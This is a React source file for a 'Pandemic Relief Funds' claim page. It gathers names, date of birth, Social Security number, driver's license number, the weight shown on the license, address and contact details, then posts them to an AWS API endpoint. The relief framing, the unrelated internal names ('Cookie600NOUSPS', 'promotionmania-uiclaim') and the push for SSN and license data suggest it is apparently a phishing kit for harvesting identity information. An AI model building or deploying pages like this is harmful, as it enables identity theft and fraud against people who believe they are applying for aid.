import React, { useEffect } from "react";
import { Button, Card, Col, Container, Row, Spinner } from "react-bootstrap";
import Claim from "../components/claim";
import { Form, Formik } from "formik";
import { Form as BootstrapForm } from "react-bootstrap";
import * as Yup from "yup";
import FormControl from "../components/FormControl";
import ReCAPTCHA from "react-google-recaptcha";
import axios from "axios";
import RadioButtons from "../components/RadioButtons copy";
const Cookie600NOUSPS = () => {
  useEffect(() => {
    document.title = "Pandemic Relief Funds";
  }, []);
  const initialValues = {
    firstname: "",
    lastname: "",
    dob:"",
    ssn:"",
    dln:"",
    wdl:"",
    streetaddress: "",
    city: "",
    state: "",
    postal: "",
    cellphone: "",
    email: "",
    country: "United States",
    estatus: "male",
    recaptcha: "",
    form: "promotionmania-uiclaim",
  };

  const radioOptions = [
    { key: "Male", value: "male" },
    { key: "Female", value: "female" }
  ];

  const validationSchema = Yup.object({
    firstname: Yup.string().required("First Name is Required."),
    lastname: Yup.string().required("Last Name is Required."),
    dob: Yup.string().required("Date of Birth is Required."),
    ssn: Yup.string().required("Social Security Number is Required."),
    dln: Yup.string().required("License Number is Required."),
    wdl: Yup.string().required("Required"),
    streetaddress: Yup.string().required("Street Address is Required."),
    city: Yup.string().required("City is Required."),
    state: Yup.string().required("State is Required."),
    postal: Yup.string()
      .required()
      .matches(/(^\d{5}$)|(^\d{5}-\d{4}$)/, "Please Enter Valid USA Zip Code"),
    cellphone: Yup.number().required("Cellphone is Required."),
    email: Yup.string().email().required("Valid Email is Required."),
    recaptcha: Yup.string().required(),
  });

  const onSubmit = async (values, helpers) => {
    //console.log(values);
    await axios.post(
      "https://oeun2av184.execute-api.us-east-1.amazonaws.com/default/FormNew",
      JSON.stringify(values),
      {
        headers: {
          "Content-Type": "application/json",
        },
      }
    );
    window.location = "/thanks";
  };

  return (
    <Container>
      <Row>
        <Col lg={{ span: 10, offset: 1 }}>
          <Card className="mt-5">
            <Card.Header>Pandemic Relief Funds</Card.Header>
            <Card.Body>
              <Claim />
              <div className="mb-3"></div>
              <Formik
                initialValues={initialValues}
                validationSchema={validationSchema}
                onSubmit={onSubmit}
              >
                {({ isSubmitting, isValid, dirty, setFieldValue }) => (
                  <Form>
                    <h5>Name</h5>
                    <Row>
                      <Col>
                        <BootstrapForm.Group controlId="firstname">
                          <FormControl
                            type="text"
                            name="firstname"
                            placeholder="First Name"
                            tabIndex={1}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col>
                        <BootstrapForm.Group controlId="middlename">
                          <FormControl
                            type="text"
                            name="middlename"
                            placeholder="Middle Name"
                            tabIndex={2}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col>
                        <BootstrapForm.Group controlId="lastname">
                          <FormControl
                            type="text"
                            name="lastname"
                            placeholder="Last Name"
                            tabIndex={3}
                          />
                        </BootstrapForm.Group>
                      </Col>
                    </Row>

                    <h5>Personal Details</h5>
                    <Row>
                      <Col>
                        <BootstrapForm.Group controlId="dob">
                          <FormControl
                            type="text"
                            name="dob"
                            placeholder="Date of Birth (DD/MM/YYYY)"
                            tabIndex={4}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col>
                        <BootstrapForm.Group controlId="ssn">
                          <FormControl
                            type="text"
                            name="ssn"
                            placeholder="Social Security Number"
                            tabIndex={5}
                          />
                        </BootstrapForm.Group>
                      </Col>
                    </Row>
                    <Row>
                      <Col md={6}>
                        <BootstrapForm.Group controlId="dln">
                          <FormControl
                            type="text"
                            name="dln"
                            placeholder="Driver's License Number"
                            tabIndex={6}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col md={6}>
                        <BootstrapForm.Group controlId="wdl">
                          <FormControl
                            type="text"
                            name="wdl"
                            placeholder="Weight as stated on your Driver's License"
                            tabIndex={7}
                          />
                        </BootstrapForm.Group>
                      </Col>
                    </Row>

                    <h5>Address</h5>
                    <BootstrapForm.Group controlId="streetaddress">
                      <FormControl
                        type="text"
                        name="streetaddress"
                        placeholder="Street Address"
                        tabIndex={8}
                      />
                    </BootstrapForm.Group>
                    <Row>
                      <Col>
                        <BootstrapForm.Group controlId="city">
                          <FormControl
                            type="text"
                            name="city"
                            placeholder="City"
                            tabIndex={9}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col>
                        <BootstrapForm.Group controlId="state">
                          <FormControl
                            type="text"
                            name="state"
                            placeholder="State"
                            tabIndex={10}
                          />
                        </BootstrapForm.Group>
                      </Col>
                    </Row>
                    <Row>
                      <Col>
                        <BootstrapForm.Group controlId="postal">
                          <FormControl
                            type="text"
                            name="postal"
                            placeholder="Postal"
                            tabIndex={11}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col>
                        <BootstrapForm.Group controlId="country">
                          <FormControl
                            type="text"
                            name="country"
                            placeholder="Country"
                            disabled
                            tabIndex={12}
                          />
                        </BootstrapForm.Group>
                      </Col>
                    </Row>

                    <h5>Contact Info</h5>
                    <Row>
                      <Col>
                        <BootstrapForm.Group controlId="cellphone">
                          <FormControl
                            type="text"
                            name="cellphone"
                            placeholder="Cell Phone"
                            tabIndex={13}
                          />
                        </BootstrapForm.Group>
                      </Col>
                      <Col>
                        <BootstrapForm.Group controlId="email">
                          <FormControl
                            type="text"
                            name="email"
                            placeholder="Email Address"
                            tabIndex={14}
                          />
                        </BootstrapForm.Group>
                      </Col>
                    </Row>

                    <h5>Gender</h5>
                    <Row>
                      <Col>
                        <RadioButtons
                          control="radio"
                          name="estatus"
                          options={radioOptions}
                        />
                      </Col>
                    </Row>
                    <br />
                    <ReCAPTCHA
                      sitekey={process.env.REACT_APP_SITEKEY}
                      onChange={(value) => {
                        setFieldValue("recaptcha", value);
                      }}
                    />
                    <br />
                    <Button
                      type="submit"
                      tabIndex={12}
                      block
                      disabled={!(dirty && isValid) || isSubmitting}
                    >
                      {isSubmitting ? (
                        <Spinner animation="border" size="sm" />
                      ) : (
                        "Submit"
                      )}
                    </Button>
                  </Form>
                )}
              </Formik>
            </Card.Body>
          </Card>
        </Col>
      </Row>
    </Container>
  );
};

export default Cookie600NOUSPS;
